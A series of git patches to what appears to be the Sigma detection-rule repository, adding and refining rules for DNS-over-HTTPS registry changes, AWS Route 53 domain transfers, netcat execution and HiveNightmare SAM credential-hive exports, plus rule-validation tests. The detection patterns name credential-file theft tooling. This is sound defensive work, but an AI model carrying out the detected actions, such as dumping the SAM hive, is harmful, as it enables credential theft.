+++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -0,0 +1,28 @@ +title: DNS-over-HTTPS Enabled by Registry +id:04b45a8a-d11d-49e4-9acc-4a1b524407a5 +description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. +author: Austin Songer +status: experimental +references: + - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html + - https://github.com/elastic/detection-rules/issues/1371 + - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode +tags: + - attack.defense_evasion + - attack.t1140 +logsource: + product: windows + category: registry_event +detection: + selection1: + TargetObject: + - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' + Details: 'DWORD (1)' + selection2: + TargetObject: + - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' + Details: 'DWORD (secure)' + condition: selection1 or selection2 +falsepositives: +- "Unlikely" +level: "medium" From edf1740ec4e2d1ffaf729f7b523cb04902da9977 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:05:31 -0500 Subject: [PATCH 0040/1367] Update sysmon_dns_over_https_enabled.yml --- .../windows/registry_event/sysmon_dns_over_https_enabled.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index 777261b3..feb47971 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -17,11 +17,11 @@ detection: selection1: TargetObject: - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' - Details: 'DWORD (1)' + Details: 'DWORD (1)' selection2: TargetObject: - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' - Details: 'DWORD (secure)' + Details: 'DWORD (secure)' condition: selection1 or selection2 falsepositives: - "Unlikely" From 6e8df1e9d23d2a9ff4d45d652b26eb26a4e30758 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:05:54 -0500 Subject: [PATCH 0041/1367] Update sysmon_dns_over_https_enabled.yml --- .../windows/registry_event/sysmon_dns_over_https_enabled.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index feb47971..3ca50cef 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -6,10 +6,10 @@ status: experimental references: - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - https://github.com/elastic/detection-rules/issues/1371 - - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode + - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode tags: - attack.defense_evasion - - attack.t1140 + - attack.t1140 logsource: product: windows category: registry_event From d093fea6a5a98ae2e61072b270ec2382e5f1a34a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:07:02 -0500 Subject: [PATCH 0042/1367] Update sysmon_dns_over_https_enabled.yml --- .../windows/registry_event/sysmon_dns_over_https_enabled.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index 3ca50cef..fa4c8a6c 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -17,11 +17,11 @@ detection: selection1: TargetObject: - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' - Details: 'DWORD (1)' + Details: 'DWORD (1)' selection2: TargetObject: - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' - Details: 'DWORD (secure)' + Details: 'DWORD (secure)' condition: selection1 or selection2 falsepositives: - "Unlikely" From 4ddcea0714219006208c659a028687c9fc0003a2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:09:41 -0500 Subject: [PATCH 0043/1367] Update sysmon_dns_over_https_enabled.yml --- rules/windows/registry_event/sysmon_dns_over_https_enabled.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index fa4c8a6c..bc22e026 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -10,6 +10,7 @@ references: tags: - attack.defense_evasion - attack.t1140 + - attack.t1112 logsource: product: windows category: registry_event From 44630b215ec94e9ab1e3b0c373a075b3d61f1ede Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:22:56 -0500 Subject: [PATCH 0044/1367] Update sysmon_dns_over_https_enabled.yml --- rules/windows/registry_event/sysmon_dns_over_https_enabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index bc22e026..c8b48d6a 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -1,5 +1,5 @@ title: DNS-over-HTTPS Enabled by Registry -id:04b45a8a-d11d-49e4-9acc-4a1b524407a5 +id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. author: Austin Songer status: experimental From 2929f8915e01377785485e89858e8d64bfbdeb11 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:27:41 -0500 Subject: [PATCH 0045/1367] Update sysmon_dns_over_https_enabled.yml --- .../registry_event/sysmon_dns_over_https_enabled.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index c8b48d6a..34ee8df0 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -23,7 +23,11 @@ detection: TargetObject: - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' Details: 'DWORD (secure)' - condition: selection1 or selection2 + selection3: + TargetObject: + - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' + Details: 'DWORD (1)' + condition: selection1 or selection2 or selection3 falsepositives: - "Unlikely" level: "medium" From aff52640969aaa788860f4673911281b1757d577 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 22 Jul 2021 19:25:51 +0200 Subject: [PATCH 0046/1367] Add check for status and level --- .../powershell_suspicious_mail_acces.yml | 2 +- tests/test_rules.py | 28 +++++++++++++++++++ 2 files changed, 29 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_suspicious_mail_acces.yml b/rules/windows/powershell/powershell_suspicious_mail_acces.yml index 660c798a..13210d4a 100644 --- a/rules/windows/powershell/powershell_suspicious_mail_acces.yml +++ b/rules/windows/powershell/powershell_suspicious_mail_acces.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - description: EnableScriptBlockLogging must be set to enable + definition: EnableScriptBlockLogging must be set to enable detection: selection: EventID: 4104 diff --git a/tests/test_rules.py b/tests/test_rules.py index a53d70f0..1e1cec92 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -302,6 +302,34 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'modified' fields. (create one, e.g. date: 2019/01/14)") + def test_optional_status(self): + faulty_rules = [] + valid_status = ["stable","test","experimental"] + for file in self.yield_next_rule_file_path(self.path_to_rules): + status_str = self.get_rule_part(file_path=file, part_name="status") + if status_str: + if not status_str in valid_status: + print(Fore.YELLOW + "Rule {} has a invalide 'status' (check wiki).".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + + def test_level(self): + faulty_rules = [] + valid_level = ["informational","low","medium","high","critical"] + for file in self.yield_next_rule_file_path(self.path_to_rules): + level_str = self.get_rule_part(file_path=file, part_name="level") + if not level_str: + print(Fore.YELLOW + "Rule {} has no field 'level'.".format(file)) + faulty_rules.append(file) + elif not level_str in valid_level: + print(Fore.YELLOW + "Rule {} has a invalide 'level' (check wiki).".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + def test_references(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): From d7783ea9d7bdae29a4f06595a6b4c45c719d8839 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 12:42:53 -0500 Subject: [PATCH 0047/1367] Update sysmon_dns_over_https_enabled.yml --- .../windows/registry_event/sysmon_dns_over_https_enabled.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index 34ee8df0..e3ba5eb6 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -1,5 +1,6 @@ title: DNS-over-HTTPS Enabled by Registry id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 +date: 2021/07/22 description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. author: Austin Songer status: experimental @@ -29,5 +30,5 @@ detection: Details: 'DWORD (1)' condition: selection1 or selection2 or selection3 falsepositives: -- "Unlikely" -level: "medium" +- Unlikely +level: medium From 3f6e700547e7afe65061fe1b666609d80418cb89 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:39:33 -0500 Subject: [PATCH 0048/1367] Create aws_route_53_domain_transferred_to_another_account.yml --- ..._domain_transferred_to_another_account.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/aws_route_53_domain_transferred_to_another_account.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml new file mode 100644 index 00000000..8fb1ff59 --- /dev/null +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml @@ -0,0 +1,22 @@ +title: "AWS Route 53 Domain Transferred to Another Account" +description: "Identifies when a request has been made to transfer a Route 53 domain to another AWS account." +author: Elastic, Austin Songer +status: experimental +date: 2021/07/22 +reference: + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: route53.amazonaws.com + selection_eventname: + - eventName: TransferDomainToAnotherAwsAccount + condition: all of them +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 +falsepositives: +- A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low From 019764f83f80f0cef7d0ca608dea35dcb73dd9dd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:40:05 -0500 Subject: [PATCH 0049/1367] Update aws_route_53_domain_transferred_to_another_account.yml --- ...aws_route_53_domain_transferred_to_another_account.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml index 8fb1ff59..9dd6a0f3 100644 --- a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml @@ -1,5 +1,5 @@ -title: "AWS Route 53 Domain Transferred to Another Account" -description: "Identifies when a request has been made to transfer a Route 53 domain to another AWS account." +title: AWS Route 53 Domain Transferred to Another Account +description: Identifies when a request has been made to transfer a Route 53 domain to another AWS account. author: Elastic, Austin Songer status: experimental date: 2021/07/22 @@ -15,8 +15,8 @@ detection: condition: all of them tags: - attack.persistence - - attack.credential_access - - attack.t1098 + - attack.credential_access + - attack.t1098 falsepositives: - A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low From 831a4909d2633c4f28239bf122cc3439a29cab96 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:40:28 -0500 Subject: [PATCH 0050/1367] Update aws_route_53_domain_transferred_to_another_account.yml --- .../aws_route_53_domain_transferred_to_another_account.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml index 9dd6a0f3..3ca1501f 100644 --- a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml @@ -1,5 +1,5 @@ title: AWS Route 53 Domain Transferred to Another Account -description: Identifies when a request has been made to transfer a Route 53 domain to another AWS account. +description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. author: Elastic, Austin Songer status: experimental date: 2021/07/22 From 41f41b4c7bc5d2ac354d9cc824a043f6344d342c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:41:08 -0500 Subject: [PATCH 0051/1367] Delete aws_route_53_domain_transferred_to_another_account.yml --- ..._domain_transferred_to_another_account.yml | 22 ------------------- 1 file changed, 22 deletions(-) delete mode 100644 rules/cloud/aws_route_53_domain_transferred_to_another_account.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml deleted file mode 100644 index 3ca1501f..00000000 --- a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml +++ /dev/null @@ -1,22 +0,0 @@ -title: AWS Route 53 Domain Transferred to Another Account -description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. -author: Elastic, Austin Songer -status: experimental -date: 2021/07/22 -reference: - - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml -logsource: - service: cloudtrail -detection: - selection_source: - - eventSource: route53.amazonaws.com - selection_eventname: - - eventName: TransferDomainToAnotherAwsAccount - condition: all of them -tags: - - attack.persistence - - attack.credential_access - - attack.t1098 -falsepositives: -- A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. -level: low From 1ec329f5628018565edb10e23680411337d7adcb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:41:59 -0500 Subject: [PATCH 0052/1367] Create aws_route_53_domain_transferred_to_another_account.yml --- ..._domain_transferred_to_another_account.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/aws_route_53_domain_transferred_to_another_account.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml new file mode 100644 index 00000000..3ca1501f --- /dev/null +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml @@ -0,0 +1,22 @@ +title: AWS Route 53 Domain Transferred to Another Account +description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. +author: Elastic, Austin Songer +status: experimental +date: 2021/07/22 +reference: + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: route53.amazonaws.com + selection_eventname: + - eventName: TransferDomainToAnotherAwsAccount + condition: all of them +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 +falsepositives: +- A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low From 82419ff8ddc4eb3417944215a17b03db70a3e419 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:46:13 -0500 Subject: [PATCH 0053/1367] Create aws_route_53_domain_transferred_lock_disabled.yml --- ...te_53_domain_transferred_lock_disabled.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml new file mode 100644 index 00000000..2b608421 --- /dev/null +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -0,0 +1,24 @@ +title: AWS Route 53 Domain Transfer Lock Disabled +description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. +author: Elastic, Austin Songer +status: experimental +date: 2021/07/22 +reference: + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml + - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html + - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: route53.amazonaws.com + selection_eventname: + - eventName: DisableDomainTransferLock + condition: all of them +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 +falsepositives: +- A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + From cdfe0e76622e9cf02033807d1020e870f4bd57eb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:48:23 -0500 Subject: [PATCH 0054/1367] Delete sysmon_dns_over_https_enabled.yml --- .../sysmon_dns_over_https_enabled.yml | 34 ------------------- 1 file changed, 34 deletions(-) delete mode 100644 rules/windows/registry_event/sysmon_dns_over_https_enabled.yml diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml deleted file mode 100644 index e3ba5eb6..00000000 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ /dev/null @@ -1,34 +0,0 @@ -title: DNS-over-HTTPS Enabled by Registry -id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 -date: 2021/07/22 -description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. -author: Austin Songer -status: experimental -references: - - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - - https://github.com/elastic/detection-rules/issues/1371 - - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode -tags: - - attack.defense_evasion - - attack.t1140 - - attack.t1112 -logsource: - product: windows - category: registry_event -detection: - selection1: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' - Details: 'DWORD (1)' - selection2: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' - Details: 'DWORD (secure)' - selection3: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' - Details: 'DWORD (1)' - condition: selection1 or selection2 or selection3 -falsepositives: -- Unlikely -level: medium From a4b78ef4f064b93b816b4aabad9ea87d10a343f5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:48:28 -0500 Subject: [PATCH 0055/1367] Delete sysmon_dns_over_https_enabled.yml --- .../sysmon_dns_over_https_enabled.yml | 34 ------------------- 1 file changed, 34 deletions(-) delete mode 100644 rules/windows/registry_event/sysmon_dns_over_https_enabled.yml diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml deleted file mode 100644 index e3ba5eb6..00000000 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ /dev/null @@ -1,34 +0,0 @@ -title: DNS-over-HTTPS Enabled by Registry -id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 -date: 2021/07/22 -description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. -author: Austin Songer -status: experimental -references: - - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - - https://github.com/elastic/detection-rules/issues/1371 - - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode -tags: - - attack.defense_evasion - - attack.t1140 - - attack.t1112 -logsource: - product: windows - category: registry_event -detection: - selection1: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' - Details: 'DWORD (1)' - selection2: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' - Details: 'DWORD (secure)' - selection3: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' - Details: 'DWORD (1)' - condition: selection1 or selection2 or selection3 -falsepositives: -- Unlikely -level: medium From d9dc442f4ecef78810907506be68b2fc120624cc Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 23 Jul 2021 09:41:00 +0200 Subject: [PATCH 0056/1367] rule: HiveNightmare --- .../win_hivenightmare_file_exports.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/file_event/win_hivenightmare_file_exports.yml diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml new file mode 100644 index 00000000..4a6abf48 --- /dev/null +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -0,0 +1,29 @@ +title: Typical HiveNightmare SAM File Export +id: 6ea858a8-ba71-4a12-b2cc-5d83312404c7 +status: experimental +description: Detects files written by the different tools that exploit HiveNightmare +author: Florian Roth +date: 2020/07/23 +references: + - https://github.com/GossiTheDog/HiveNightmare + - https://github.com/FireFart/hivenightmare/ +logsource: + product: windows + category: file_event +tags: + - cve.2021-36934 + - attack.credential_access + - attack.t1552.001 +detection: + selection: + TargetFilename|contains: + - '\hive_sam_' # Go version + - '\SAM-2021-' # C++ version + - '\Sam.save' # PowerShell version + condition: selection +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Files that accidentally contain these strings +level: high From 5955efa750600d9774f4ca5b19a0994d1b85b9e6 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 23 Jul 2021 09:45:50 +0200 Subject: [PATCH 0057/1367] adjusted timestamp --- rules/windows/file_event/win_hivenightmare_file_exports.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index 4a6abf48..869295a3 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -19,6 +19,7 @@ detection: TargetFilename|contains: - '\hive_sam_' # Go version - '\SAM-2021-' # C++ version + - '\SAM-2022-' # C++ version - '\Sam.save' # PowerShell version condition: selection fields: From d00ca03cb67842eb19fdb5176695acad4ab1f343 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 23 Jul 2021 09:51:00 +0200 Subject: [PATCH 0058/1367] increased level to high --- rules/windows/process_creation/sysmon_netcat_execution.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/sysmon_netcat_execution.yml b/rules/windows/process_creation/sysmon_netcat_execution.yml index 21344091..1d114563 100644 --- a/rules/windows/process_creation/sysmon_netcat_execution.yml +++ b/rules/windows/process_creation/sysmon_netcat_execution.yml @@ -28,4 +28,4 @@ detection: condition: selection or selection_cmdline falsepositives: - Legitimate ncat use -level: medium +level: high From 77b4a3791696d194d8e8919a739f53d2ca151a4d Mon Sep 17 00:00:00 2001 From: Tran Trung Hieu Date: Fri, 23 Jul 2021 14:58:51 +0700 Subject: [PATCH 0059/1367] Update the references --- rules/windows/process_creation/sysmon_apt_sourgrum.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/sysmon_apt_sourgrum.yml b/rules/windows/process_creation/sysmon_apt_sourgrum.yml index 661a20dd..8ea9ea53 100644 --- a/rules/windows/process_creation/sysmon_apt_sourgrum.yml +++ b/rules/windows/process_creation/sysmon_apt_sourgrum.yml @@ -7,7 +7,7 @@ author: status: experimental level: high references: - - sha256=c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d + - https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/SOURGUM_IOC.yaml - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ date: 2021/06/15 From c0138d5ced517d8bd9beb4b79d99df8d8744ead8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 23 Jul 2021 10:39:41 +0200 Subject: [PATCH 0060/1367] add additional filename pattern to HiveNightmare rule --- rules/windows/file_event/win_hivenightmare_file_exports.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index 869295a3..46461579 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -7,6 +7,7 @@ date: 2020/07/23 references: - https://github.com/GossiTheDog/HiveNightmare - https://github.com/FireFart/hivenightmare/ + - https://github.com/WiredPulse/Invoke-HiveNightmare logsource: product: windows category: file_event @@ -20,6 +21,7 @@ detection: - '\hive_sam_' # Go version - '\SAM-2021-' # C++ version - '\SAM-2022-' # C++ version + - '\SAM-haxx' # Early C++ versions - '\Sam.save' # PowerShell version condition: selection fields: From 844c08f26af375123e752cc34be9178dab2b7358 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 23 Jul 2021 07:56:18 -0500 Subject: [PATCH 0061/1367] Update aws_route_53_domain_transferred_lock_disabled.yml --- rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml index 2b608421..3bf68c0e 100644 --- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -1,4 +1,5 @@ title: AWS Route 53 Domain Transfer Lock Disabled +id: 3940b5f1-3f46-44aa-b746-ebe615b879e0 description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. author: Elastic, Austin Songer status: experimental From de6d48289c33b1ea568d6efeb6a097e87ae9330c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 23 Jul 2021 07:56:56 -0500 Subject: [PATCH 0062/1367] Update aws_route_53_domain_transferred_lock_disabled.yml --- rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml index 3bf68c0e..f83864a5 100644 --- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -5,7 +5,7 @@ author: Elastic, Austin Songer status: experimental date: 2021/07/22 reference: - - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html logsource: From 